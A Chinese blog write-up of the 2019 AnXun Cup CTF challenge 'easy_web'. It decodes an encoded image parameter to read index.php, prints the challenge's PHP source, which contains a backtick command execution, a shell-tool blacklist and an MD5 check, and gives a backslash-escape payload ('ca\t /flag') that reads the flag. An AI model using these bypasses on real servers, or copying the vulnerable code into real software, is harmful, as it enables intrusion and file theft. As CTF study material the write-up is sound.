[安洵杯 2019]easy_web

[安洵杯 2019]easy_web

开启环境之后是这样的

 

 url是这样的：http://xxx/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=

看到cmd可以猜测是命令执行漏洞，简单测试了两个命令发现在黑名单内

 

 将注意力转移到img上，进行解密

加密方式是：hex->base64->base64

我们解密 base64->base64->hex，解码后为555.png

 

 

猜测有文件包含漏洞，用同样的加密方式尝试包含index.php，查看过滤的黑名单

将index.php编码为TmprMlpUWTBOalUzT0RKbE56QTJPRGN3放入img参数中，获得了index.php的base64编码后的结果，为：

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

<?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;charset=utf-8'); $cmd = $_GET['cmd']; if (!isset($_GET['img']) || !isset($_GET['cmd']))     header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='); $file = hex2bin(base64_decode(base64_decode($_GET['img'])));   $file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file); if (preg_match("/flag/i", $file)) {     echo '<img src ="./ctf3.jpeg">';     die("xixi～ no flag"); } else {     $txt = base64_encode(file_get_contents($file));     echo "<img src='data:image/gif;base64," . $txt . "'></img>";     echo "<br>"; } echo $cmd; echo "<br>"; if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {     echo("forbid ~");     echo "<br>"; } else {     if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {         echo `$cmd`;     } else {         echo ("md5 is funny ~");     } }

　　可以看到在此处过滤了img解码后包含大小写flag的情况，防止我们直接使用文件包含获取flag

?

1 2 3 4

if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {     echo("forbid ~");     echo "<br>"; }

　　这里是我们第一个要突破的地方，可以看到是对输入的cmd进行了过滤，我们需要一个能够读取文件的命令

接着是这里

?

1 2 3 4 5

if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {         echo `$cmd`;     } else {         echo ("md5 is funny ~");     }

　　md5碰撞，让a,b两个值不相等而md5值相等，因为$cmd使用了` `反引号包裹，所以最后是返回cmd的执行结果。

也就是说我们需要突破命令的黑名单过滤和md5碰撞

关于md5碰撞可以参考这篇文章，自制值相同而md5不相同的数据：https://xz.aliyun.com/t/2232

这里我得到的是：

 

 将测试语句加上

?

1 2 3

if($_POST['param1']!==$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){     die("success!"); }

　　

 

 可以看到返回值中有success!，证明我们碰撞成功了，这也会是我们做这道题所会用到的两个值。

然后是命令过滤突破，观察黑名单列表

先使用cmd=dir%20/查看根目录下的文件

 

 可以看到flag，接下来就是fuzz linux下能够读取文件的命令

这里的：

 

 使用了两个反斜杠和四个反斜杠来过滤，但正则表达式中需要三个反斜杠才可以匹配到一个真正的反斜杠，所以实际上反斜杠没有被过滤。而在linux命令中可以添加反斜杠来绕过黑名单过滤。

所以有

cmd=ca\t%20/flag

 

 也可以使用linux下的sort命令来进行文件读取

Linux sort命令用于将文本文件内容加以排序。sort可针对文本文件的内容，以行为单位来排序。

其作用为：

 

 当然也可以用来读取flag文件。

 

 以上

 

 

参考链接：

https://blog.csdn.net/qq_19980431/article/details/83018232

https://xz.aliyun.com/t/2232

https://nikoeurus.github.io/2019/11/30/2019%E5%AE%89%E8%AF%A2%E6%9D%AF-Web/#easy-web

https://www.cnblogs.com/wangtanzhi/p/12244096.html

https://xz.aliyun.com/t/6911

__EOF__

本文作者：春告鳥
本文链接：https://www.cnblogs.com/Cl0ud/p/12585242.html
关于博主：评论和私信会在第一时间回复。或者直接私信我。
版权声明：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！
声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力！